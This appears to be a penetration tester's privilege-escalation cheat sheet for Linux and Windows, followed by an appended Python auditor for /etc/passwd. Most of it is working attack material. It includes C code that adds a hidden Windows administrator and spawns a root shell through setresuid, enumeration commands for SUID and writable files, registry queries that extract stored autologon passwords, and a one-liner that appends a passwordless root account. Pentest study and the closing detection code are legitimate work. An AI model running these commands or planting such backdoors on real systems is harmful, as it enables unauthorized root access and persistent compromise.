https://payatu.com/guide-linux-privilege-escalation
Linux
sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000-default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (Pre-Invoke)
Capabilities

Windows
Kernel Exploits
OS Exploits
Pass The Hash
Password reuse
DLL hijacking (Path)
Vulnerable services
Writable services binaries path
Unquoted services
Listening ports on localhost
Registry keys
Linux: https://github.com/lucyoa/kernel-exploits
Windows: https://github.com/abatchy17/WindowsExploits
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
http://www.fuzzysecurity.com/tutorials/16.html

Windows Add User
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

/* Runs both "net" commands through the shell; replace <username> and <password> before compiling. */
int main(void)
{
    int rc = system("net user <username> <password> /add && net localgroup administrators <username> /add");
    return rc == 0 ? 0 : EXIT_FAILURE;
}

SUID Change
SUID
Set owner user ID.

#define _GNU_SOURCE  /* setresuid() is a GNU extension in <unistd.h> */
#include <stdlib.h>  /* system */
#include <unistd.h>  /* setresuid */

int main(void)
{
    /* Only raises privilege if this binary is itself SUID root. */
    if (setresuid(0, 0, 0) != 0)
        return 1;
    system("/bin/bash");
    return 0;
}
Privilege Escalation:
# Find binaries that will execute as the owner (SUID)
find / -perm -u=s -type f 2>/dev/null

# Find binaries that will execute as the group (SGID)
find / -perm -g=s -type f 2>/dev/null

# Find sticky-bit directories (-type d: the sticky bit matters on directories, not binaries)
find / -perm -1000 -type d 2>/dev/null

find / -perm -4000 2>/dev/null

# Files writable by everyone
find / -writable -type f 2>/dev/null

# World writeable directories
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

# World writeable files
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

# Writeable config files
find /etc/ -writable -type f 2>/dev/null

# SUID binaries owned by root, with a long listing
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
Windows Exploit Suggester
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls
Windows Priv Escalation
AlwaysInstallElevated
Check if the following registry settings are set to "1" (the policy only takes effect when both the HKCU and HKLM values are 1):
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Autologon credentials stored in the registry:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Basic Linux Enumeration
Distribution type & kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux

Default writeable directory / folder
/tmp
/dev/shm

Search for passwords
# Search for password within config.php
grep -R 'password' config.php

Find possible other writeable directory / folder
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \; 2>/dev/null

Service(s) running as root user
ps aux | grep root
ps -ef | grep root

Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives
ls -lah /var/cache/yum/

Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab

Find pattern in file:
grep -rnw '/etc/passwd' -e 'root'

Sticky bit, SGID, SUID
Sticky bit
find / -perm -1000 -type d 2>/dev/null

SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null

SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null

SUID or SGID (the parentheses are needed; without them -type f applies only to the -u=s branch)
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null

Add user to /etc/passwd and root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
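The last item above is also the easiest to detect from the blue side: a second uid 0 account, an empty password field, or a malformed line in /etc/passwd never appears on a healthy host. The following audit function is an added example (not from the original cheat sheet); it parses the text of a passwd file, flags those conditions, and is run here against a constructed sample that ends with the exact `hodor` line from above.

```python
from typing import List, Tuple

Finding = Tuple[int, str, str]  # (line number, account name, description)


def audit_passwd(passwd_text: str) -> List[Finding]:
    """Scan the text of an /etc/passwd file for entries a defender should investigate.

    Flags: malformed lines, a non-numeric uid/gid, an empty password field
    (login requires no password), and uid 0 or gid 0 granted to any account
    other than root. The `hodor::0:0:...` backdoor line trips three of these.
    """
    findings: List[Finding] = []
    for line_no, raw in enumerate(passwd_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry, expected 7 fields"))
            continue
        name, pw, uid, gid, _gecos, _home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((line_no, name, "non-numeric uid or gid"))
            continue
        if pw == "":
            findings.append((line_no, name, "empty password field: login requires no password"))
        if name != "root" and uid == "0":
            findings.append((line_no, name, f"uid 0 on a non-root account (shell {shell})"))
        if name != "root" and gid == "0":
            findings.append((line_no, name, "primary group 0 (root) on a non-root account"))
    return findings


# Constructed sample, not from a real host: three ordinary entries plus the backdoor line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hodor::0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    # On a live system read the real file: audit_passwd(open("/etc/passwd").read())
    for line_no, name, desc in audit_passwd(SAMPLE_PASSWD):
        print(f"passwd:{line_no}: {name}: {desc}")
```

Run it from a cron job or your configuration-management check and alert on any non-empty result; the same loop can be pointed at a saved baseline copy to diff against the live file.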